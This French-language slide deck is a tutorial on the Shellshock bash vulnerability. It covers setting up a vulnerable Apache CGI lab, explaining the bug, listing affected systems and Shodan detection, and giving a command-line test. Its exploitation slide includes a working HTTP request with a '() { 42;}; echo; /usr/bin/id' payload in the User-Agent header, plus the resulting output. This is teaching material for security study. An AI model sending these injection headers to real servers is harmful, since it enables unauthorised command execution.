<!-- .slide: data-background="images/shellshock/shellshock-bug.png" data-background-size="99%" data-background-color="black"-->


## se faire un système vulnérable

* Pas évident
  * dans le monde debian
    * choisir une vieille [Ubuntu server 12.04.4](http://ubuntu-release.locaweb.com.br/12.04/)
* paramèter le réseau [DYI - My Security Lab](http://mazenovi.github.com)

```shell
$ sudo apt-get apache2 && sudo a2enmod cgi
```


## configuration

```shell
$ sudo vi /usr/lib/cgi-bin/netstat.cgi
```

```shell
#!/bin/bash
echo "Content-type: text/html"
echo
echo "Executing: netstat -nlt"
echo
echo "<pre>"
/bin/netstat -nlt
echo "</pre>"
```


## configuration

```shell
$ sudo vi /etc/apache2/sites-available/serve-cgi-bin.conf
```

```xml
<IfModule mod_alias.c>
    <IfModule mod_cgid.c>
        Define ENABLE_USR_LIB_CGI_BIN
    </IfModule>

    <IfDefine ENABLE_USR_LIB_CGI_BIN>
        ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
        <Directory "/usr/lib/cgi-bin">
            AllowOverride None
            Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
            Require all granted
        </Directory>
    </IfDefine>
</IfModule>
```


## timline

* découverte en septembre 2014
    * [Shellshock - timeline](http://www.dwheeler.com/essays/shellshock.html#timeline)
    * [CVE-2014-6271](http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271)
        * [CVE-2014-7169](http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7169), which NIST says "exists because of an incomplete fix for CVE-2014-6271."
    * existe depuis le lancement du logiciel il y a 22 ans
        * interpréteur par défaut GNU/Linux et pas mal d'Unix libres


## explications

```shell
() { 42;}; echo; /usr/bin/id
```

* **() { 42;}** fonction qui "fait" 42
* **; echo** évite des erreurs serveur dans certains cas
* **; /usr/bin/id** payload juste pour la PoC
    * exécution de commandes arbitraires avec les privilèges du user apache


## explications

* ne dépend d'aucun appel système dans le script CGI
  * le code est exécuté lors de la préparation des variables d'environnement
  * ces variables peuvent contenir des fonctions appelable par le script
    * mais en fait tout code hors fonction était exécuté ...

Note:
- vitesse de distribution des patchs
    - temps de compilation et de distribution dans les paquets


## Impacts

* tout serveur utilisant des cgi en bash est vulnérable
* concerne aussi
    * certains DHCP
    * serveurs de messagerie
    * serveurs SSH
    * Linux, Mac OS X, Android, Cygwin
    * routeurs domestiques
    * bitcoin core
    * objets connectés en tout genre

Note:
    - pour la mail c'est certaines versions de qmail qui sont vulnérables
    - Bitcoin core: porte monnaie bitcoin


## Détection

* [<i class="fa fa-twitter"></i> shodan](https://twitter.com/shodanhq)
* [<i class="fa fa-newspaper-o"></i> shodan blog](http://blog.shodan.io/)
* [CGI Shodan Search](https://www.shodan.io/search?query=html%3A.cgi)
* [Shellshock Shodan Report](https://www.shodan.io/report/plt4tqpk)

* test en ligne de commande

```shell
x='() { :;}; echo vulnerable' bash -c "echo ceci est un test"
```


## Exploitation

* avec burp suite par exemple

```http
GET /cgi-bin/netstat.cgi HTTP/1.1
Host: go.od
User-Agent: () { 42;}; echo; /usr/bin/id
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
```

* affiche dans le navigateur en cas de vulnérabilité

```shell
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

Note:
- si on arrive pas à voir ou si on veut tesr en aveugle
    - ping d'un serveur maitrisé
        - on attend les requêtes ping
    - résolution d'un domaine maitrisé
        - on attend les requêtes DNS
